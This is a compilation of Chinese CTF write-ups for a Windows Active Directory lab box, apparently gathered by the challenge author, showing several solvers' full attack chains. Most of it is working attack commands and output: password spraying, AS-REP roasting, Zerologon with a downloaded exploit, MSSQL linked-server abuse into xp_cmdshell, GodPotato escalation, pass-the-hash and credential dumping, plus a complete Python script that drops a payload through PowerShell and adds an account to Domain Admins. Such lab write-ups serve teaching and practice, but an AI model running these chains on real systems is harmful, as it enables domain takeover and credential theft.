XMCVE.local\sqlsvc:1112:...:d93ef04edb808c5bce3a5bd67b936ca9:::

这里最重要的意义在于：

krbtgt 哈希已经被导出，说明整个域的核心机密已经暴露。
题目里的所有域用户哈希也全部拿到了。
从“拿到一台主机的 SYSTEM”进一步升级成了“完全接管整套域”。

因此本题最终的通关状态，不只是单机 SYSTEM，而是完整的域控接管。

关键命令汇总

端口识别：

nmap -Pn -sC -sV -T4 192.168.56.155

弱口令喷洒：

netexec smb 192.168.56.155 -u /tmp/babydc_valid_users.txt -p /tmp/babydc_passwords.txt —continue-on-success

LDAP 查询 mowen：

1
ldapsearch -x -H ldap://192.168.56.155 \
2
  -D 'XMCVE\admin' -w 'Password123!' \
3
  -b 'DC=XMCVE,DC=local' \
4
  '(sAMAccountName=mowen)' \
5
  pwdLastSet description memberOf userAccountControl

AS-REP Roast：

1
GetNPUsers.py XMCVE.local/ \
2
  -dc-ip 192.168.56.155 \
3
  -no-pass \
4
  -request \
5
  -format hashcat \
6
  -outputfile /tmp/mowen_asrep.hash \
7
  -usersfile /tmp/mowen_only.txt

离线爆破：

hashcat -m 18200 /tmp/mowen_asrep.hash /usr/share/wordlists/rockyou.txt —force

远程备份注册表：

reg.py XMCVE.local/mowen:‘1maxwell’@192.168.56.155 backup -o ‘C:\Windows\Temp’

拉取 hive：

1
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SAM.save' /tmp/SAM.save
2
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SYSTEM.save' /tmp/SYSTEM.save
3
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SECURITY.save' /tmp/SECURITY.save

离线提取秘密：

secretsdump.py -sam /tmp/SAM.save -system /tmp/SYSTEM.save -security /tmp/SECURITY.save LOCAL

PTH 拿 SYSTEM：

1
psexec.py \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
3
  ./Administrator@192.168.56.155 \
4
  'whoami /all'

导出整域凭据：

1
secretsdump.py \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
3
  ./Administrator@192.168.56.155

最终拿到的关键凭据

XMCVE\admin : Password123!
XMCVE\support : Password123!
XMCVE\mowen : 1maxwell
XMCVE\sqlsvc : Sql!2026
Administrator NTLM : d94f9831271e229dbc6e712097b63168
krbtgt NTLM : 1e3c4fe72e1383c576b4b3aeef4730a8

复盘

这题表面上看是一个带 IIS 和 MSSQL 的 Windows 主机，但真正的核心突破点并不是 Web，也不是 SQL，而是域用户属性和组权限设计。前面的统一弱口令只负责帮我们拿到一个能查询 LDAP 的入口，真正打通题目的关键是：

先通过 LDAP 找到 mowen
再利用它的 DONT_REQ_PREAUTH
拿到 mowen 口令后再利用 Backup Operators
最终通过离线提取出来的管理员哈希完成 PTH

这条链路最大的优点是稳定，不依赖内存注入，不依赖复杂提权洞，也不依赖题目作者额外埋的 Web RCE。只要把账户属性和组权限利用对了，就能非常稳地一路走到 SYSTEM

Echoin（Zerologon）

配置好kali和vritualbox：

VirtualBox 靶机 → Host-Only（192.168.56.x）
VMware Kali → 也接到 VirtualBox Host-Only 这张网卡

在56网段找ip,匹配对应的MAC：08:00:27:f1:06:a7，就是这个靶机的IP

ip：192.168.56.101

nmap

1
┌──(echoin㉿kali)-[~]
2
└─$ nmap -sV 192.168.56.101 -A
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 15:30 CST
4
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
5
Nmap scan report for 192.168.56.101
6
Host is up (0.0014s latency).
7
Not shown: 987 filtered tcp ports (no-response)
8
PORT     STATE SERVICE       VERSION
9
53/tcp   open  domain        Simple DNS Plus
10
80/tcp   open  http          Microsoft IIS httpd 10.0
11
| http-methods:
12
|_  Potentially risky methods: TRACE
13
|_http-server-header: Microsoft-IIS/10.0
14
|_http-title: CASTLEVANIA Portal
15
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-29 07:31:08Z)
16
135/tcp  open  msrpc         Microsoft Windows RPC
17
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
18
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-First-Site-Name)
19
445/tcp  open  microsoft-ds?
20
464/tcp  open  kpasswd5?
21
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
22
636/tcp  open  tcpwrapped
23
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 13.00.5026.00; SP2
24
| ms-sql-ntlm-info:
25
|   192.168.56.101:1433:
26
|     Target_Name: XMCVE
27
|     NetBIOS_Domain_Name: XMCVE
28
|     NetBIOS_Computer_Name: CASTLEVANIA
29
|     DNS_Domain_Name: XMCVE.local
30
|     DNS_Computer_Name: CASTLEVANIA.XMCVE.local
31
|     DNS_Tree_Name: XMCVE.local
32
|_    Product_Version: 10.0.17763
33
|_ssl-date: 2026-03-29T07:31:54+00:00; 0s from scanner time.
34
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
35
| Not valid before: 2026-03-29T04:51:28
36
|_Not valid after:  2056-03-29T04:51:28
37
| ms-sql-info:
38
|   192.168.56.101:1433:
39
|     Version:
40
|       name: Microsoft SQL Server 2016 SP2
41
|       number: 13.00.5026.00
42
|       Product: Microsoft SQL Server 2016
43
|       Service pack level: SP2
44
|       Post-SP patches applied: false
45
|_    TCP port: 1433
46
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-First-Site-Name)
47
3269/tcp open  tcpwrapped
48
MAC Address: 08:00:27:F1:06:A7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
49
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
50
Device type: general purpose
51
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
52
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
53
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1803 (91%), Microsoft Windows 10 1903 - 21H1 (91%), Microsoft Windows Server 2019 (91%)
54
No exact OS matches for host (test conditions non-ideal).
55
Network Distance: 1 hop
56
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows
57

58
Host script results:
59
| smb2-security-mode:
60
|   3:1:1:
61
|_    Message signing enabled and required
62
|_nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f1:06:a7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
63
| smb2-time:
64
|   date: 2026-03-29T07:31:13
65
|_  start_date: N/A
66

67
TRACEROUTE
68
HOP RTT     ADDRESS
69
1   1.37 ms 192.168.56.101
70

71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
72
Nmap done: 1 IP address (1 host up) scanned in 57.62 seconds

关键端口：

53 DNS
80 http
88 Kerberos
389/636/3268/3269 LDAP/GC
139/445 SMB
1433 MSSQL

关键信息：

NetBIOS 域名：XMCVE
主机名：CASTLEVANIA
完整域名：CASTLEVANIA.XMCVE.local

80端口：访问IP

扫目录

1
feroxbuster -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx,asp,txt,config,zip,bak -k

没扫到

1433端口开着，扫一下mssql相关信息：

1
nmap -Pn -p1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-config,ms-sql-ntlm-info 192.168.56.101

得到的信息：

1433 ：对应服务是 Microsoft SQL Server 2016 SP2
主机：CASTLEVANIA
用户：XMCVE
域：XMCVE.local

但现在还不能直接从 SQL 打进去：ms-sql-config 报的是：No login credentials

139/445 SMB:共享信息

1
smbclient -L //192.168.56.101 -N

列出共享名
看到部分共享目录
枚举域信息
枚举用户/组
拿到主机角色信息

但是没有

389/636/3268/3269 :LDAP/GC匿名查询

域名
OU
用户
组
计算机对象
邮箱
描述字段
SPN
域策略线索

1
ldapsearch -x -H ldap://192.168.56.101 -s base namingcontexts
2
ldapsearch -x -H ldap://192.168.56.101 -b "DC=XMCVE,DC=local"

得到信息：

DC=XMCVE,DC=local
CN=Configuration,DC=XMCVE,DC=local
CN=Schema,CN=Configuration,DC=XMCVE,DC=local
DC=DomainDnsZones,DC=XMCVE,DC=local
DC=ForestDnsZones,DC=XMCVE,DC=local

分析：

确认这是 AD 域，但后续想拿用户，得先找到凭据

Kerberos

因为靶机打开页面是有一个用户名Alucard，所以枚举一下

Alucard@XMCVE.local

administrator@XMCVE.local
Alucard@XMCVE.local
sqlsvc@XMCVE.local

再把这 3 个用户一起测一遍 AS-REP Roast

1
cat > valid_users.txt << 'EOF'
2
administrator
3
Alucard
4
sqlsvc
5
EOF
6

7
impacket-GetNPUsers XMCVE.local/ -dc-ip 192.168.56.101 -usersfile valid_users.txt -no-pass -request -format hashcat -outputfile asrep.txt

都没有UF_DONT_REQUIRE_PREAUTH，所以不行

试试cve

CVE-2020-1472（Zerologon）
CVE-2021-34527（PrintNightmare）

先试一下：CVE-2020-1472（Zerologon）

用 Zerologon 将机器账户密码清空，用 Zerologon 把域控机器账户密码清空之后，利用这个被控制的机器账户身份，通过 AD 复制接口，把域控里的 NTDS 凭据数据同步出来

1
impacket-secretsdump -just-dc -no-pass 'XMCVE.local/CASTLEVANIA$@192.168.56.101'

拿到凭据：

1
Administrator NTLM：d94f9831271e229dbc6e712097b63168
2
Alucard NTLM：d94f9831271e229dbc6e712097b63168
3
sqlsvc NTLM：d93ef04edb808c5bce3a5bd67b936ca9
4
CASTLEVANIA$ NTLM：31d6cfe0d16ae931b73c59d7e0c089c0

拿 Administrator 的 hash 直接登录

1
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 XMCVE.local/Administrator@192.168.56.101

k1ne(AI？)

很诡异的一篇wp，邮件中回复添加好友也是加的很迅速，询问wp中的问题时晾了我半个小时
四个问题的回复都是”ai打出来的，我啥也不知道”…真令我恼火
疑点有四，其一：wp一开始的dirsearch目录扫描就不可能扫到iis内置文本
该选手对此回复：“我kali里连不上那个靶机，ai扫出来的”
其二：flag是在哪个位置拿到的？可否截个图
该选手对此回复：“镜像里指向的是C:\Users\Administrator\Desktop\flag.txt”
但是flag我在上架环境前便删得一干二净且让他给我截图时选手对此保持沉默无视
其三：wp里也没有记录p2zhh，mowen的密码获取方式
该选手对此回复：“sql查出来的，镜像里都有，ai都能识别得到”
？？？…这句话一出我对这道题瞬间变得如此陌生
其四：secretsdump出来的hash是如何转出明文的？
该选手对此回复：“明文是我先拿到哈希，然后镜像有一段明文，然后对比，哈希值一模一”
后续：该选手因别的题导致出现在封神台中

镜像导入

下载好镜像导⼊

信息收集

打开发现⽤户需要密码，猜测靶机启动了web服务尝试访问主机的⽹络信息，

扫描端口

拿到关键信息

靶机ip是10.78.22.137，扫⼀下常⻅的端⼝

发现存在⼀些服务，我在 Kali 中使⽤ nmap 扫描⽬标时，返回结果显示相关端⼝均为 filtered，可能是因为我kali在vm另⼀套⽹络⾥，可能有隔离。猜测开放了 Web 与 MSSQL 等服务。

目录扫描

访问⼀下

然后⽬录扫描⼀下有没有备份⽂件之类的

1
dirsearch -u http://10.78.22.137/ -e txt,config,bak,old,zip

发现泄露了⽂件

http://10.78.22.137/poo_connection.txt↗

Mssql登录&&嵌套执行

给出了mssql登录凭据尝试登录执⾏sql

查看端口&&枚举用户

验证权限

验证mowen身份权限

远程连接(失败)

获取hash

写脚本进⾏远程拿⽂件在⼀个终端开启

开另⼀个终端

离线提取Administrator哈希

Yarn（Zerologon）

前置准备

先定义变量：

1
$vm = 'f5429e33-3d2c-44cd-8f77-3db2ea0c74ba' $vbox = 'C:\Program Files\Oracle\VirtualBox\VBoxManage.exe' $plink = 'C:\Program Files\PuTTY\plink.exe'

确认虚拟机在运行：

1
& $vbox list runningvms

看网卡模式和现有转发：

1
& $vbox showvminfo $vm --machinereadable | Select-String 'nic|Forwarding'

看来宾 IP：

1
& $vbox guestproperty enumerate $vm | Select-String 'V4/IP'

服务器转发

接下来做服务器转发本来想用kali 发现两个c段不同不好通信

被迫选择服务器中转

1
$vm = 'f5429e33-3d2c-44cd-8f77-3db2ea0c74ba'
2
$vbox = 'C:\Program Files\Oracle\VirtualBox\VBoxManage.exe'
3
& $vbox guestproperty enumerate $vm | Select-String 'V4/IP'

做中转

安装环境并连接本机

安装环境并连接本机:

1
python3 -m venv ~/babydc-venv
2
. ~/babydc-venv/bin/activate
3
pip install impacket ldap3 pyfiglet termcolor
4
sudo apt update
5
sudo apt install -y ldap-utils socat curl
6
curl -L -o ~/zerologon.py https://raw.githubusercontent.com/VoidSec/CVE-2020-1472/master/cve-2020-1472-exploit.py

检查确认

检查：

1
nc -vz 127.0.0.1 21389
2
nc -vz 127.0.0.1 21445
3
nc -vz 127.0.0.1 20135

确认 LDAP：

本地代理

. Ubuntu 启动本地代理

1
sudo pkill -f "socat TCP-LISTEN:135" || true
2
sudo pkill -f "socat TCP-LISTEN:445" || true
3
sudo pkill -f "socat TCP-LISTEN:49674" || true
4
sudo pkill -f "socat TCP-LISTEN:49667" || true
5
sudo nohup socat TCP-LISTEN:135,reuseaddr,fork TCP:127.0.0.1:20135 >/tmp/socat135.log 2>&1 &
6
sudo nohup socat TCP-LISTEN:445,reuseaddr,fork TCP:127.0.0.1:21445 >/tmp/socat445.log 2>&1 &
7
sudo nohup socat TCP-LISTEN:49674,reuseaddr,fork TCP:127.0.0.1:34974 >/tmp/socat49674.log 2>&1 &
8
sudo nohup socat TCP-LISTEN:49667,reuseaddr,fork TCP:127.0.0.1:34967 >/tmp/socat49667.log 2>&1 &

监听

开启监听：

测 SMB

1
python3 - <<'PY'
2
from impacket.smbconnection import SMBConnection
3
c = SMBConnection('CASTLEVANIA', '127.0.0.1', sess_port=445, timeout=10)
4
print('dialect', hex(c.getDialect()))
5
print('server', c.getServerName())
6
print('domain', c.getServerDomain())
7
print('os', c.getServerOS())
8
PY

Zerologon

打 Zerologon

1
printf 'y\n' | python3 ~/zerologon.py -t 127.0.0.1 -n CASTLEVANIA

导出管理员哈希

导出管理员哈希：

1
secretsdump.py -just-dc-user Administrator -no-pass 'XMCVE.local/CASTLEVANIA$@127.0.0.1' -dc-ip 127.0.0.1 -target-ip 127.0.0.1

1
babydc-venv) ubuntu@VM-16-10-ubuntu:~$ secretsdump.py -just-dc-user Administrator -no-pass 'XMCVE.local/CASTLEVANIA$@127.0.0.1' -dc-ip 127.0.0.1 -target-ip 127.0.0.1
2
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
5
[*] Using the DRSUAPI method to get NTDS.DIT secrets
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
7
[*] Kerberos keys grabbed
8
Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54eb4b40e2ca21b2fcb3e6298969d741fc6e70a9367786
9
Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a83b2d9b4439c
10
Administrator:des-cbc-md5:80584683e63d5845
11
[*] Cleaning up...
12
(babydc-venv) ubuntu@VM-16-10-ubuntu:~$

验证高权限命令执行

1
psexec.py -hashes :d94f9831271e229dbc6e712097b63168 'XMCVE.local/Administrator@127.0.0.1' "cmd.exe /c whoami & hostname"

1
(babydc-venv) ubuntu@VM-16-10-ubuntu:~$ psexec.py -hashes :d94f9831271e229dbc6e712097b63168 'XMCVE.local/Administrator@127.0.0.1' "cmd.exe /c whoami & hostname"
2
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Requesting shares on 127.0.0.1.....
5
[*] Found writable share ADMIN$
6
[*] Uploading file XWajdGZq.exe
7
[*] Opening SVCManager on 127.0.0.1.....
8
[*] Creating service kiue on 127.0.0.1.....
9
[*] Starting service kiue.....
10
[!] Press help for extra shell commands                                                                                                                                            nt authority\system
11
[*] Process cmd.exe /c whoami & hostname finished with ErrorCode: 0, ReturnCode: 0
12
[*] Opening SVCManager on 127.0.0.1.....
13
CASTLEVANIA
14
[*] Stopping service kiue.....
15
[*] Removing service kiue.....
16
[*] Removing file XWajdGZq.exe.....
17
(babydc-venv) ubuntu@VM-16-10-ubuntu:~$

成功获得shell

1
Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54eb4b40e2ca21b2fcb3e6298969d741fc6e70a9367786
2
Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a83b2d9b4439c
3
Administrator:des-cbc-md5:80584683e63d5845

空白(土豆提权)

题目分析

靶机对外开放了 80、445、1433、25。80 口只有一个很简单的 IIS 默认站点，首页没有可利用逻辑，但站点目录里放了一个明文连接配置，直接给出 SQL 登录信息：

1
server=localhost;
2
user=wuwupor;
3
password=lovlyBaby
4
database=master

先用这组账号连接 SQL Server，可以看到当前登录只是 master 里的 guest，本身不是 sysadmin。问题的关键在 linked server。枚举 sys.servers 之后可以看到本机额外配置了两个 linked server：

1
SELECT name, product, provider, data_source, is_linked, is_remote_login_enabled
2
FROM sys.servers;

结果里有：

1
POO_CONFIG
2
POO_PUBLIC

继续直接在 linked server 上执行查询，能看到两个 linked server 的远端上下文完全不同：

1
EXEC ('SELECT @@SERVERNAME AS server_name,
2
             SYSTEM_USER   AS current_login,
3
             ORIGINAL_LOGIN() AS original_login,
4
             IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_CONFIG;
5

6
EXEC ('SELECT @@SERVERNAME AS server_name,
7
             SYSTEM_USER   AS current_login,
8
             ORIGINAL_LOGIN() AS original_login,
9
             IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_PUBLIC;

返回结果里：

1
POO_CONFIG -> current_login = poo_config, is_sysadmin = 0
2
POO_PUBLIC -> current_login = sa,         is_sysadmin = 1

到这里利用链已经很清楚了。外部只要持有 wuwupor / lovlyBaby，就能通过 POO_PUBLIC 借壳成 sa。

SQL 利用

确认配置项时还能看到 xp_cmdshell 已经开启：

1
SELECT name, CAST(value_in_use AS int) AS value_in_use
2
FROM sys.configurations
3
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries', 'clr enabled', 'remote access');

于是可以直接通过 POO_PUBLIC 执行系统命令：

EXEC (‘EXEC xp_cmdshell ”whoami''') AT POO_PUBLIC;

返回身份是：

xmcve\sqlsvc

接着看权限：

EXEC (‘EXEC xp_cmdshell ”whoami /priv''') AT POO_PUBLIC;

输出里最关键的一项是：

SeImpersonatePrivilege Enabled

这说明 sqlsvc 已经满足典型的本地提权条件，只差一条能把 SeImpersonatePrivilege 用起来的链。这里直接使用 GodPotato，它对 Windows Server 2019 可用。

系统提权

利用思路非常直接：

用 xp_cmdshell 下发 GodPotato.exe
让 GodPotato 以 SYSTEM 身份执行一条命令
把已知明文口令的 sqlsvc / Sql!2026 加进 Domain Admins
重新用 sqlsvc / Sql!2026 发起网络登录，直接拿管理员级远程会话

GodPotato 先用 whoami 验证时，返回结果里已经能看到：

CurrentUser: NT AUTHORITY\SYSTEM

然后执行：

net group “Domain Admins” sqlsvc /add /domain

命令成功后，重新使用 sqlsvc / Sql!2026 进行远程执行，就能拿到管理员级 shell。这里用 psexec 验证，返回结果是：

1
nt authority\system
2
CASTLEVANIA

成功拿到admin shell

Exp

下面给出完整利用脚本。脚本会先连 SQL，确认 POO_PUBLIC 可用，然后临时开启一个本地 HTTP 服务，把同目录中的 GodPotato.exe 下发到目标，执行提权，再自动调用 psexec 拉起管理员 shell。

1
import argparse
2
import contextlib
3
import functools
4
import http.server
5
import shutil
6
import socket
7
import socketserver
8
import subprocess
9
import sys
10
import threading
11
import time
12
from pathlib import Path
13

14
import pytds
15

16

17
def quote_sql(value: str) -> str:
18
    return value.replace("'", "''")
19

20

21
def get_local_ip_for_target(target_ip: str) -> str:
22
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
23
    try:
24
        sock.connect((target_ip, 1433))
25
        return sock.getsockname()[0]
26
    finally:
27
        sock.close()
28

29

30
class QuietHandler(http.server.SimpleHTTPRequestHandler):
31
    def log_message(self, fmt: str, *args) -> None:
32
        pass
33

34

35
class ThreadingHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
36
    daemon_threads = True
37
    allow_reuse_address = True
38

39

40
@contextlib.contextmanager
41
def serve_directory(directory: Path, host: str):
42
    handler = functools.partial(QuietHandler, directory=str(directory))
43
    server = ThreadingHTTPServer((host, 0), handler)
44
    thread = threading.Thread(target=server.serve_forever, daemon=True)
45
    thread.start()
46
    try:
47
        yield server.server_address[1]
48
    finally:
49
        server.shutdown()
50
        server.server_close()
51
        thread.join(timeout=1)
52

53

54
class MSSQLExploit:
55
    def __init__(self, server: str, user: str, password: str, database: str = "master", port: int = 1433):
56
        self.conn = pytds.connect(
57
            server=server,
58
            database=database,
59
            user=user,
60
            password=password,
61
            port=port,
62
            validate_host=False,
63
            use_tz=False,
64
            autocommit=True,
65
        )
66

67
    def close(self) -> None:
68
        self.conn.close()
69

70
    def run_query(self, query: str):
71
        cur = self.conn.cursor()
72
        cur.execute(query)
73
        if not cur.description:
74
            return []
75
        rows = cur.fetchall()
76
        columns = [c[0] for c in cur.description]
77
        return [dict(zip(columns, row)) for row in rows]
78

79
    def xp_cmdshell_via_public(self, command: str):
80
        query = f"EXEC ('EXEC xp_cmdshell ''{quote_sql(command)}''') AT POO_PUBLIC"
81
        return self.run_query(query)
82

83

84
def print_rows(title: str, rows) -> None:
85
    print(f"\n=== {title} ===")
86
    if not rows:
87
        print("(no rows)")
88
        return
89
    for row in rows:
90
        print(row)
91

92

93
def ensure_psexec() -> str:
94
    candidates = [
95
        shutil.which("psexec.py"),
96
        str(Path(sys.executable).with_name("psexec.py")),
97
        str(Path(sys.executable).resolve().parent.parent / "Scripts" / "psexec.py"),
98
    ]
99
    for candidate in candidates:
100
        if candidate and Path(candidate).exists():
101
            return candidate
102
    raise FileNotFoundError("psexec.py not found in PATH or next to the current Python installation.")
103

104

105
def main() -> int:
106
    parser = argparse.ArgumentParser(description="Exploit for codegate babydc.")
107
    parser.add_argument("--target", default="192.168.124.7")
108
    parser.add_argument("--sql-user", default="wuwupor")
109
    parser.add_argument("--sql-password", default="lovlyBaby")
110
    parser.add_argument("--domain", default="XMCVE")
111
    parser.add_argument("--pivot-user", default="sqlsvc")
112
    parser.add_argument("--pivot-password", default="Sql!2026")
113
    parser.add_argument("--command", default="cmd.exe", help="Command passed to psexec after sqlsvc becomes Domain Admin.")
114
    args = parser.parse_args()
115

116
    base_dir = Path(__file__).resolve().parent
117
    godpotato = base_dir / "GodPotato.exe"
118
    if not godpotato.exists():
119
        raise FileNotFoundError(f"Missing helper: {godpotato}")
120

121
    target_ip = args.target
122
    local_ip = get_local_ip_for_target(target_ip)
123
    print(f"[+] target: {target_ip}")
124
    print(f"[+] local callback IP: {local_ip}")
125

126
    sql = MSSQLExploit(target_ip, args.sql_user, args.sql_password)
127
    try:
128
        print_rows(
129
            "linked server context",
130
            sql.run_query(
131
                "EXEC ('SELECT @@SERVERNAME AS server_name, SYSTEM_USER AS current_login, "
132
                "IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_PUBLIC"
133
            ),
134
        )
135
        print_rows("xp_cmdshell identity", sql.xp_cmdshell_via_public("whoami /priv"))
136

137
        with serve_directory(base_dir, "0.0.0.0") as port:
138
            download_cmd = (
139
                'powershell -c "try {(New-Object Net.WebClient).DownloadFile('
140
                f"'http://{local_ip}:{port}/{godpotato.name}',"
141
                "'C:\\Windows\\Temp\\GodPotato.exe');"
142
                'Write-Output OK} catch { Write-Output $_.Exception.Message }"'
143
            )
144
            print_rows("download helper", sql.xp_cmdshell_via_public(download_cmd))
145
            print_rows(
146
                "helper presence",
147
                sql.xp_cmdshell_via_public(
148
                    'powershell -c "Get-Item \'C:\\Windows\\Temp\\GodPotato.exe\' | '
149
                    'Select-Object Name,Length | Format-List"'
150
                ),
151
            )
152

153
        add_group_cmd = (
154
            'C:\\Windows\\Temp\\GodPotato.exe -cmd '
155
            f'"cmd /c net group \\"Domain Admins\\" {args.pivot_user} /add /domain"'
156
        )
157
        print_rows("godpotato group add", sql.xp_cmdshell_via_public(add_group_cmd))
158
        time.sleep(2)
159
    finally:
160
        sql.close()
161

162
    psexec = ensure_psexec()
163
    user_spec = f"{args.domain}/{args.pivot_user}:{args.pivot_password}@{target_ip}"
164
    cmd = [sys.executable, psexec, user_spec, args.command]
165
    print(f"[+] launching psexec: {' '.join(cmd)}")
166
    return subprocess.call(cmd)
167

168

169
if __name__ == "__main__":
170
    raise SystemExit(main())

Wadding(土豆提权)

题面要求并不是提交在线环境里的字符串 flag，而是：

1
对镜像本地搭建并渗透，拿到 Administrator shell，提交 WP 到邮箱审核，通过后才给官方 flag

这台镜像里我已经拿到了 Administrator 远程执行权限，当前可复现的管理员 shell 证明如下：

1
xmcve\administrator
2
CASTLEVANIA

另外，镜像里还残留了一个被删除的本地 flag 文本，在回收站文件内容中可恢复出：

1
FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

但要说明，这个并不是题面承诺的“官方比赛 flag”，因为题面明确说了官方 flag 要在提交 WP 审核后才发放。

环境信息

题目给了本地 OVA：

1
D:\Install\Bloodstained.ova

导入后我把机器改成：

NIC1 = Host-Only
NIC2 = NAT

这样宿主机可以直接访问客机。

客机关键信息：

主机名：CASTLEVANIA
域名：XMCVE.local
Web：80/tcp
MSSQL：1433/tcp
LDAP / AD：389, 445, 88 ...

通过 Guest Additions 和网络探测确认到：

Host-only 网卡：169.254.212.20
NAT 网卡：10.0.3.15

攻击面梳理

首页只有一个静态维护页：

1
<h1>Employee Portal</h1>
2
<p>Under maintenance...</p>

看起来没什么内容，但离线查看 VMDK 后发现 inetpub\wwwroot 下除了 index.html 之外还有一个非常关键的文件：

1
C:\inetpub\wwwroot\poo_connection.txt

内容是明文 SQL 连接串：

1
server=localhost;
2
user=wuwupor;
3
password=lovlyBaby
4
database=master

这一条直接把 MSSQL 入口送出来了。

第一步：连接 MSSQL

用连接串登录 SQL Server：

1
wuwupor / lovlyBaby

登录成功，但当前账号不是 sysadmin：

1
select is_srvrolemember('sysadmin')

返回 0。

继续枚举时，发现 SQL Server 上配置了两个非常可疑的 linked server：

1
select name, product, provider, data_source,
2
       is_rpc_out_enabled, is_data_access_enabled
3
from sys.servers

结果里有：

POO_PUBLIC
POO_CONFIG

第二步：利用 linked server 提权到 SQL sysadmin

进一步验证这两个 linked server 的远端身份：

1
select * from openquery(POO_PUBLIC, 'select @@servername as srv, db_name() as db, system_user as su, user_name() as un')

1
srv = CASTLEVANIA
2
db  = master
3
su  = sa
4
un  = dbo

也就是说：

1
wuwupor -> POO_PUBLIC -> localhost 上的 sa/dbo

这就相当于把本来不具备 sysadmin 的账号，借 linked server 直接借成了 sa。

而且 xp_cmdshell 已经是开启状态：

1
exec ('exec master..sp_configure ''xp_cmdshell''') at POO_PUBLIC

第三步：拿到系统命令执行

通过 linked server 执行命令：

1
exec ('exec master..xp_cmdshell ''whoami''') at POO_PUBLIC

回显是：

1
xmcve\sqlsvc

也就是说当前操作系统命令执行身份是 SQL Server 服务账号 xmcve\sqlsvc。

继续查它的特权：

1
whoami /priv

可以看到：

1
SeImpersonatePrivilege        Enabled

所以标准的 Potato 链是可用的。

第四步：为什么 PrintSpoofer 不行

我最开始先试了 PrintSpoofer，但很快发现这台机器的 Spooler 是关着的，而且启动类型是 Disabled：

1
Get-Service Spooler
2
Status    : Stopped
3
StartType : Disabled

因此 PrintSpoofer 这条链虽然二进制能执行，但不会真正完成提权。

第五步：改用 GodPotato

由于系统是 Windows Server 2019，且 sqlsvc 拥有 SeImpersonatePrivilege，直接换成 GodPotato 即可。

我在宿主机开了一个临时 HTTP 服务，把 GodPotato-NET4.exe 投到客机，然后通过 SQL 执行：

1
C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c net user Administrator Xmctf2026Aa /domain"

GodPotato 的关键回显如下：

1
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
2
[*] Start Search System Token
3
[*] PID : 804 Token:0x800  User: NT AUTHORITY\SYSTEM
4
[*] Find System Token : True
5
[*] CurrentUser: NT AUTHORITY\SYSTEM
6
[*] process start with pid ...
7
The command completed successfully.

这说明链条已经把 sqlsvc 抬到了 SYSTEM，并成功执行了我们给它的命令。

随后再查：

1
net user Administrator /domain

可以看到 Password last set 已经更新，说明域管理员密码确实被改掉了。

第六步：验证 Administrator shell

最后直接用新密码通过 impacket 的 wmiexec.py 验证远程管理员执行：

1
python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 whoami
2
python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 hostname

回显：

1
xmcve\administrator
2
CASTLEVANIA

这一步已经满足题目要求的：

1
拿到 Administrator shell

补充：本地 flag 文本的恢复

虽然官方 flag 要人工审核后发放，但镜像里其实残留了一个已经删除的本地 flag 文件线索。

在 Alucard 的 Recent 里有一个快捷方式：

1
C:\Users\Alucard\Recent\flag.lnk

它指向：

1
C:\Users\Administrator\Desktop\flag.txt

这个文件本身已经被删掉了，但在回收站目录中仍然留有内容文件：

1
$Recycle.Bin\S-1-5-21-...-500\$RIZ9PVX.txt

离线读这个文件，能恢复出：

1
FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

再次强调，这更像是镜像内的本地证明文本，不一定等于比赛平台最后发放的正式 flag。

Exploit

完整利用脚本放在：

1
exploit/solve.py

